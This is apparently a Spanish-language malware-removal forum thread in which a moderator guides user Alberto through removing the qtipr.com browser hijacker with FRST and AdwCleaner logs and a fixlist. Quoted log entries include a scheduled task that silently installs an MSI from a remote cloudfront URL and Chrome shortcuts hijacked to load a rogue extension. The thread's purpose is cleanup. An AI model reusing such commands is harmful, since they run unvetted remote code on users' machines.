      FirewallRules: [TCP Query User{07FA785C-D441-442A-B5B3-08880B90FCAB}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe] => (Allow) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe
      FirewallRules: [UDP Query User{4FAEBDCC-79BE-4F65-A6E3-FE1B2C4491EF}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe] => (Allow) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe
      FirewallRules: [{860197CF-C3CE-451F-8A5A-BE537DF7CF9D}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 16 DEMO\fifasetup\fifaconfig.exe
      FirewallRules: [{0C1F444D-F79B-476A-8EF2-21813500ADB0}] => (Allow) C:\Program Files (x86)\Origin Games\FIFA 16 DEMO\fifasetup\fifaconfig.exe
      FirewallRules: [{1A2BF766-B14E-4284-916F-A8C9B9012592}] => (Allow) C:\WINDOWS\system32\rundll32.exe
      FirewallRules: [{D9CAF51A-E15B-4CE5-885F-BBFE207309F3}] => (Allow) C:\WINDOWS\Temp\5A36.tmp
      FirewallRules: [{7A5B90F2-AB02-472C-848F-D890B6FCB981}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

      ==================== Restore Points =========================

      14-02-2017 22:13:04 Punto de control programado

      ==================== Faulty Device Manager Devices =============


      ==================== Event log errors: =========================

      Application errors:
      ==================
      Error: (02/16/2017 09:32:25 AM) (Source: HP Active Health) (EventID: 91) (User: )
      Description: Unhandled Exception. Application will terminate immediately.
      System.NullReferenceException: Object reference not set to an instance of an object.
      at HP.ActiveHealth.Commons.Objects.ElevatedProcessVerifier.IsProcessElevated(Process process)
      at HP.ActiveHealth.Core.Program..ctor(String[] args, Boolean mustCheckSignature, Boolean validateIni, Boolean setupPowerOptimization)
      at HP.ActiveHealth.Core.ActiveHealthMain.Main(String[] args)

      Error: (02/16/2017 03:21:45 AM) (Source: Winlogon) (EventID: 4005) (User: )
      Description: El proceso de inicio de sesión de Windows finalizó inesperadamente.

      Error: (02/16/2017 03:03:06 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa LiveComm.exe, versión 17.5.9600.20911, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 1bac

      Hora de inicio: 01d2880071f346ae

      Hora de finalización: 4294967295

      Ruta de acceso de la aplicación: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe

      Identificador de informe: 6786f36b-f3f4-11e6-8363-142d276a8518

      Nombre completo de paquete con errores: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe

      Identificador de aplicación relativa del paquete con errores: ppleae38af2e007f4358a809ac99a64a67c1

      Error: (02/15/2017 08:43:08 AM) (Source: HP Active Health) (EventID: 91) (User: )
      Description: Unhandled Exception. Application will terminate immediately.
      System.NullReferenceException: Object reference not set to an instance of an object.
      at HP.ActiveHealth.Commons.Objects.ElevatedProcessVerifier.IsProcessElevated(Process process)
      at HP.ActiveHealth.Core.Program..ctor(String[] args, Boolean mustCheckSignature, Boolean validateIni, Boolean setupPowerOptimization)
      at HP.ActiveHealth.Core.ActiveHealthMain.Main(String[] args)

      Error: (02/15/2017 03:16:15 AM) (Source: NvStreamSvc) (EventID: 1) (User: )
      Description: Event-ID 1

      Error: (02/15/2017 03:16:14 AM) (Source: NvStreamSvc) (EventID: 1) (User: )
      Description: Event-ID 1

      Error: (02/15/2017 03:12:54 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup526.exe, versión 2.0.0.0, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 13a8

      Hora de inicio: 01d2873925067d4c

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup526.exe

      Identificador de informe: a1cf182e-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:09:40 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup527.exe, versión 5.27.0.5976, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 17e0

      Hora de inicio: 01d2873857ace269

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup527.exe

      Identificador de informe: 0c63391d-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:09:40 AM) (Source: Application Hang) (EventID: 1002) (User: )
      Description: El programa ccsetup527.exe, versión 5.27.0.5976, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

      Identificador de proceso: 1f0c

      Hora de inicio: 01d287388e97429c

      Hora de finalización: 0

      Ruta de acceso de la aplicación: C:\Users\Alberto\Downloads\ccsetup527.exe

      Identificador de informe: 058f6d89-f32c-11e6-8360-142d276a8518

      Nombre completo de paquete con errores:

      Identificador de aplicación relativa del paquete con errores:

      Error: (02/15/2017 03:08:18 AM) (Source: ESENT) (EventID: 104) (User: )
      Description: ccsetup527 (6112) testing: El motor de base de datos detuvo la instancia (0) con el error (-510).



      Secuencia interna de intervalos: [1] 0.000, [2] 0.000, [3] 0.000, [4] 0.000, [5] 0.000, [6] 0.000, [7] 0.000, [8] 0.000, [9] 0.000, [10] 0.000, [11] 0.000, [12] 0.000, [13] 0.000, [14] 0.000, [15] 0.000.


      System errors:
      =============
      Error: (02/16/2017 06:27:51 PM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 13:21:18 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 01:21:18 PM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 10:36:02 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 09:25:46 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
      Description: El servidor {4EB61BAC-A3B6-4760-9581-655041EF4D69} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 09:21:02 AM) (Source: EventLog) (EventID: 6008) (User: )
      Description: El cierre anterior del sistema a las 3:21:35 del ‎16/‎02/‎2017 resultó inesperado.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/16/2017 03:22:13 AM) (Source: DCOM) (EventID: 10010) (User: ALBERTO)
      Description: El servidor {D63B10C5-BB46-4990-A94F-E40B9D520160} no se registró con DCOM dentro del tiempo de espera requerido.

      Error: (02/15/2017 11:57:08 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
      Description: El módulo de extensibilidad de WLAN se detuvo inesperadamente.

      Ruta de acceso del módulo: C:\WINDOWS\system32\Rtlihvs.dll

      Error: (02/15/2017 11:57:08 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
      Description: El módulo de extensibilidad de WLAN se detuvo inesperadamente.

      Ruta de acceso del módulo: C:\WINDOWS\system32\Rtlihvs.dll


      CodeIntegrity:
      ===================================
      Date: 2017-02-03 00:44:01.175
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-03 00:44:00.807
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-27 02:45:55.362
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-27 02:45:54.971
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 15:25:41.619
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 15:25:41.228
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 02:16:43.403
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-21 02:16:42.856
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-18 03:30:22.998
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-01-18 03:30:22.639
      Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.


      ==================== Memory info ===========================

      Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
      Percentage of memory in use: 22%
      Total physical RAM: 16276.27 MB
      Available physical RAM: 12663.5 MB
      Total Virtual: 17300.27 MB
      Available Virtual: 13924.2 MB

      ==================== Drives ================================

      Drive c: (Windows8_OS) (Fixed) (Total:890.62 GB) (Free:140.56 GB) NTFS ==>[system with boot components (obtained from drive)]
      Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.7 GB) NTFS

      ==================== MBR & Partition Table ==================

      ========================================================
      Disk: 0 (Size: 931.5 GB) (Disk ID: E4F3DC52)

      Partition: GPT.

      ==================== End of Addition.txt ====================

    6. #6
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Re: Eliminar qtipr.com

      Log del ADWCLEANER (que por cierto, siempre encuentra lo mismo, lo elimina y vuelve a aparecer)
      # AdwCleaner v6.043 - Logfile created 16/02/2017 at 23:22:43
      # Updated on 27/01/2017 by Malwarebytes
      # Database : 2017-02-13.1 [Local]
      # Operating System : Windows 8.1 (X64)
      # Username : Alberto - ALBERTO
      # Running from : C:\Users\Alberto\Desktop\adwcleaner_6.043.exe
      # Mode: Clean
      # Support : https://www.malwarebytes.com/support



      ***** [ Services ] *****



      ***** [ Folders ] *****



      ***** [ Files ] *****



      ***** [ DLL ] *****



      ***** [ WMI ] *****



      ***** [ Shortcuts ] *****

      [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
      [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
      [-] Shortcut disinfected: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
      [-] Shortcut disinfected: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk


      ***** [ Scheduled Tasks ] *****



      ***** [ Registry ] *****



      ***** [ Web browsers ] *****



      *************************

      :: "Tracing" keys deleted
      :: Winsock settings cleared

      *************************

      C:\AdwCleaner\AdwCleaner[C10].txt - [7118 Bytes] - [09/02/2017 13:35:47]
      C:\AdwCleaner\AdwCleaner[C11].txt - [13913 Bytes] - [09/02/2017 17:34:48]
      C:\AdwCleaner\AdwCleaner[C12].txt - [3326 Bytes] - [09/02/2017 17:57:07]
      C:\AdwCleaner\AdwCleaner[C13].txt - [3076 Bytes] - [09/02/2017 18:06:41]
      C:\AdwCleaner\AdwCleaner[C14].txt - [3510 Bytes] - [09/02/2017 18:59:34]
      C:\AdwCleaner\AdwCleaner[C15].txt - [3372 Bytes] - [09/02/2017 19:08:00]
      C:\AdwCleaner\AdwCleaner[C16].txt - [3843 Bytes] - [10/02/2017 12:54:28]
      C:\AdwCleaner\AdwCleaner[C17].txt - [3768 Bytes] - [14/02/2017 04:17:41]
      C:\AdwCleaner\AdwCleaner[C18].txt - [4053 Bytes] - [15/02/2017 23:56:58]
      C:\AdwCleaner\AdwCleaner[C19].txt - [1840 Bytes] - [16/02/2017 23:22:43]
      C:\AdwCleaner\AdwCleaner[C1].txt - [2757 Bytes] - [04/02/2016 03:17:40]
      C:\AdwCleaner\AdwCleaner[C2].txt - [7873 Bytes] - [28/02/2016 17:33:16]
      C:\AdwCleaner\AdwCleaner[C3].txt - [2444 Bytes] - [05/12/2015 02:57:02]
      C:\AdwCleaner\AdwCleaner[C4].txt - [2972 Bytes] - [04/01/2016 19:04:10]
      C:\AdwCleaner\AdwCleaner[C5].txt - [2327 Bytes] - [12/07/2016 05:07:10]
      C:\AdwCleaner\AdwCleaner[C6].txt - [3766 Bytes] - [24/07/2016 10:24:43]
      C:\AdwCleaner\AdwCleaner[C7].txt - [3600 Bytes] - [05/09/2016 13:30:05]
      C:\AdwCleaner\AdwCleaner[C8].txt - [5652 Bytes] - [25/12/2016 05:56:37]
      C:\AdwCleaner\AdwCleaner[C9].txt - [31108 Bytes] - [09/02/2017 12:56:13]
      C:\AdwCleaner\AdwCleaner[S10].txt - [7093 Bytes] - [09/02/2017 13:35:17]
      C:\AdwCleaner\AdwCleaner[S11].txt - [15543 Bytes] - [09/02/2017 1725]
      C:\AdwCleaner\AdwCleaner[S12].txt - [15731 Bytes] - [09/02/2017 17:11:18]
      C:\AdwCleaner\AdwCleaner[S13].txt - [13551 Bytes] - [09/02/2017 17:29:12]
      C:\AdwCleaner\AdwCleaner[S14].txt - [3637 Bytes] - [09/02/2017 17:56:36]
      C:\AdwCleaner\AdwCleaner[S15].txt - [3216 Bytes] - [09/02/2017 18:05:20]
      C:\AdwCleaner\AdwCleaner[S16].txt - [3870 Bytes] - [09/02/2017 18:55:05]
      C:\AdwCleaner\AdwCleaner[S17].txt - [3512 Bytes] - [09/02/2017 19:07:46]
      C:\AdwCleaner\AdwCleaner[S18].txt - [4235 Bytes] - [10/02/2017 12:52:33]
      C:\AdwCleaner\AdwCleaner[S19].txt - [4247 Bytes] - [14/02/2017 04:17:06]
      C:\AdwCleaner\AdwCleaner[S1].txt - [2552 Bytes] - [04/02/2016 03:15:54]
      C:\AdwCleaner\AdwCleaner[S20].txt - [4615 Bytes] - [15/02/2017 23:56:10]
      C:\AdwCleaner\AdwCleaner[S21].txt - [4763 Bytes] - [16/02/2017 23:22:26]
      C:\AdwCleaner\AdwCleaner[S2].txt - [7687 Bytes] - [28/02/2016 17:30:50]
      C:\AdwCleaner\AdwCleaner[S3].txt - [2483 Bytes] - [05/12/2015 02:55:10]
      C:\AdwCleaner\AdwCleaner[S4].txt - [3005 Bytes] - [04/01/2016 18:58:20]
      C:\AdwCleaner\AdwCleaner[S5].txt - [2385 Bytes] - [12/07/2016 05:06:05]
      C:\AdwCleaner\AdwCleaner[S6].txt - [6377 Bytes] - [24/07/2016 10:21:39]
      C:\AdwCleaner\AdwCleaner[S7].txt - [3544 Bytes] - [05/09/2016 12:59:45]
      C:\AdwCleaner\AdwCleaner[S8].txt - [5509 Bytes] - [25/12/2016 05:49:24]
      C:\AdwCleaner\AdwCleaner[S9].txt - [26962 Bytes] - [09/02/2017 12:53:46]

      ########## EOF - C:\AdwCleaner\AdwCleaner[C19].txt - [4121 Bytes] ##########

    7. #7
      Moderadora Gral.
      Avatar de @Daniela
      Registrado
      abr 2011
      Ubicación
      España
      Mensajes
      23.121

      Re: Eliminar qtipr.com

      Hola

      Sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :

      • Para hacerlo descarga >> DelFix en tu escritorio.
        • Doble clic para ejecutarlo.(Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")
        • Marca unicamente la casilla "Create registry backup".
      • Pulsar en Run.

        Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.


      A continuación vas a:

      Inicio >>> Ejecutar >>>Escribes notepad.exe.

      Ahora copia y pega estos archivos dentro del Notepad: (Se excluye la palabra código)

      Código:
      Start
      CreateRestorePoint:
      CloseProcesses:
      
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      U3 ucdrv; no ImagePath
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe 
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&amp;v=201729 /q
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] 
      
      CMD: ipconfig /flushdns
      CMD: ipconfig /renew
      CMD: bitsadmin /reset /allusers
      RemoveProxy:
      EmptyTemp:
      Hosts:
      end 
      • Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.

      Nota: Es necesario que el ejecutable Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no la herramienta no trabajara.


      • Ejecutas Frst.exe.
      • Presionas el botón Fix y aguardas a que termine.
      • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
      • Lo pegas en tu próxima respuesta.


      Pon el reporte y comenta como sigue el problema.

      Un saludo
      ✿◕‿◕✿ La impaciencia no es buena compañía ✿◕‿◕✿

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    8. #8
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Re: Eliminar qtipr.com

      Ya está solucionado. Muchas gracias por la ayuda.

      Fix result of Farbar Recovery Scan Tool (x64) Version: 18-02-2017 01
      Ran by Alberto (18-02-2017 16:32:43) Run:1
      Running from C:\Users\Alberto\Desktop
      Loaded Profiles: Alberto (Available Profiles: Alberto)
      Boot Mode: Normal
      ==============================================

      fixlist content:
      *****************
      Start
      CreateRestorePoint:
      CloseProcesses:

      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
